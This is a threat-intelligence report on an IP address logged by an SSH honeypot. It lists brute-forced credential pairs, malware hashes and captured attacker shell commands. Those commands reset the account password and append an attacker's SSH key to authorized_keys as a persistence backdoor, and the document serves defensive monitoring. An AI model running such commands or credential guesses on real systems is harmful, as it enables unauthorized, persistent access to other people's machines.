โš TROYANOSYVIRUS
Active Threat โ€ข HIGH

151.80.144.159

First Detection2/2/2026
Last Activity2/22/2026
ISPOVH SAS
๐ŸŽฏ
43.529
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
16
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ฆ Canada
City
Unknown
ASN
AS16276
ISP
OVH SAS

Attack Types

cowrie

Attacked Ports

22

Associated Malware

028b369ee17790aa79c9...โ†’0ef331d47ab5c3b9fce3...โ†’1362f314a00f607819c0...โ†’1b4aba1de07e8b42bc8b...โ†’1fb3dd3396571a462ccf...โ†’

Attempted Credentials

๐Ÿ”redis/redis123
7x
๐Ÿ”root/!Q@W3e4r
7x
๐Ÿ”hans/hans
7x
๐Ÿ”viktor/viktor
7x
๐Ÿ”henry/henry
7x
๐Ÿ”sinus/sinus
7x
๐Ÿ”root/qwerty
7x
๐Ÿ”thomas/thomas
7x
๐Ÿ”jan/jan
7x
๐Ÿ”kenneth/kenneth
7x
๐Ÿ”mcuser/mcuser
7x
๐Ÿ”aparecida/aparecida
7x
๐Ÿ”fedora/fedora
7x
๐Ÿ”root/Password1
7x
๐Ÿ”root/1qaz!QAZ
7x

Executed Commands

$if [ [ ! -d ${HOME}/.ssh ] ]16x
$then15x
$nproc14x
$fi10x
$uname -m10x
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "CuATsjk8\nCuATsjk8" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1x
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "82M6wWYR\n82M6wWYR" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1x
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "SP2NOvnB\nSP2NOvnB" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1x
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "km1Q4L7n\nkm1Q4L7n" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1x
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "123456\nbIQ3TSjS\nbIQ3TSjS" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCf1x

Risk Assessment

65
/100
LowMediumHighCritical